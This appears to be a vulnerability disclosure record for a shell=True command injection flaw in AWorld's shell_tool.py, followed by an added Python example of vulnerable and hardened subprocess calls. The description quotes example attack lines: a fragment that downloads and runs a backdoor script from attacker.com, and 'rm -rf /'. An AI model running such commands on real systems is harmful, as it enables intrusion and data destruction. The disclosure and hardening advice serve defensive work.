| Field | Value |
|---|---|
| Title | inclusionAI AWorld 0.0 Command Injection |
| Description | AWorld is a tool for building, evaluating, and running General Multi-Agent Assistance. It contains a critical OS command injection vulnerability (CWE-78) in the file `AWorld/aworld/virtual_environments/terminals/shell_tool.py`.<br><br>The code in this file executes commands supplied as input through `subprocess.run()` and `subprocess.Popen()`, and in each of these calls the `shell` parameter is set to `True`. In the `execute` method, `subprocess.run()` is called with `shell=True` when `capture_output` is `True`, and `subprocess.Popen()` is called with `shell=True` when `capture_output` is `False`. The `execute_async` method likewise calls `subprocess.Popen()` with `shell=True`.<br><br>With `shell=True` the command string is handed to the platform shell (`/bin/sh` on POSIX systems), so any attacker-controlled part of that string is parsed as shell syntax rather than passed as a literal argument: metacharacters such as `;`, `&&`, `\|` and `$(...)` let an attacker chain their own commands onto whatever the tool intended to run. Where the application forwards user-supplied shell commands, a command such as `rm -rf /` is executed as given. In a more targeted attack, an injected fragment such as `; wget http://attacker.com/backdoor.sh && sh backdoor.sh` downloads and executes a backdoor script from a remote server, leading to unauthorized access and further malicious activity.<br><br>More details: https://github.com/inclusionAI/AWorld/issues/38 |
| Source | ⚠️ https://github.com/inclusionAI/AWorld/issues/38 |
| User | ybdesire (UID 83239) |
| Submission | 04/16/2025 05:41 (12 months ago) |
| Moderation | 04/28/2025 07:56 (12 days later) |
| Status | Accepted |
| VulDB entry | 306395 [inclusionAI AWorld up to 8c257626e648d98d793dd9a1a950c2af4dd84c4e shell_tool.py subprocess.run/subprocess.Popen os command injection] |
| Points | 20 |
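The following is an added example, not code from the AWorld project or from the submitter, showing why the `shell=True` pattern described above turns a parameter into a command, and two hardened shapes for a tool that runs commands on behalf of an agent. The function names, the `ALLOWED_COMMANDS` set and the payload strings are assumptions made for illustration; the example assumes a POSIX `/bin/sh` and an `echo` binary on `PATH`.

```python
"""Added example (not AWorld's code): shell=True versus argv lists.

run_vulnerable() mirrors the reported pattern: the whole string is parsed by
/bin/sh, so a ';' in the input starts a second command. run_hardened() and
run_quoted() show two ways to make the same input inert.
"""
import shlex
import subprocess

# Hypothetical allowlist of programs an agent tool may launch (assumption).
ALLOWED_COMMANDS = {"echo", "ls", "cat", "grep"}

# Constructed payload: a harmless stand-in for "; wget ... && sh backdoor.sh".
PAYLOAD = "hello; echo INJECTED"


def run_vulnerable(command: str) -> str:
    """The reported pattern: the full string goes to the shell for parsing."""
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


def run_hardened(command: str) -> str:
    """Tokenise with shlex, allowlist the program, and pass argv as a list.

    With shell=False no shell is involved: ';', '&&', '|' and '$(...)' are
    delivered to the program as literal bytes, never interpreted.
    """
    argv = shlex.split(command)
    if not argv:
        raise ValueError("empty command")
    if argv[0] not in ALLOWED_COMMANDS:
        raise PermissionError(f"command not allowed: {argv[0]}")
    result = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return result.stdout


def run_quoted(user_value: str) -> str:
    """If a shell is genuinely needed (pipes, globbing), quote each untrusted
    value with shlex.quote() so it becomes a single literal word."""
    command = "echo " + shlex.quote(user_value)
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


def demonstrate() -> dict:
    """Run the same constructed payload through all three paths."""
    return {
        "vulnerable": run_vulnerable("echo " + PAYLOAD),  # second echo runs
        "hardened": run_hardened("echo " + PAYLOAD),      # ';' stays literal
        "quoted": run_quoted(PAYLOAD),                    # ';' stays literal
    }


if __name__ == "__main__":
    for name, out in demonstrate().items():
        print(f"{name:10s} -> {out!r}")
```

The vulnerable path prints two lines (`hello` and `INJECTED`) because `/bin/sh` split the string at the `;`; both hardened paths print the single line `hello; echo INJECTED`, and `run_hardened` refuses anything whose program is outside the allowlist before it is ever executed. For a tool whose purpose is to run arbitrary commands for an agent, the allowlist plus an argv list is the control that actually bounds what can be run; quoting alone only protects the specific values you remember to quote.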